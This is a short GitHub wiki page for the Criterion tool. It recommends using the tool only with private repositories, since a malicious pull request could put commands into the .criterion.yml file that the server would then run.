-
Notifications
You must be signed in to change notification settings - Fork 6
Recommendations
Scott Robertson edited this page Jul 27, 2013
·
2 revisions
We recommend using Criterion only for private repositories. Criterion offers great simplicity and flexibility, but left publicly accessible can open up your servers to malicious abuse.
E.g.
- Your public repo is forked
- Malicious code is entered into the .criterion.yml file
- A pull request is then sent
- This malicious code would then be run by your server, and could contain any number of terrors!
An obvious decision has been made to offset open source security against functionality. There is definitive ways we can limit or force wrappers for commands, but this in turn would limit the applications abilities.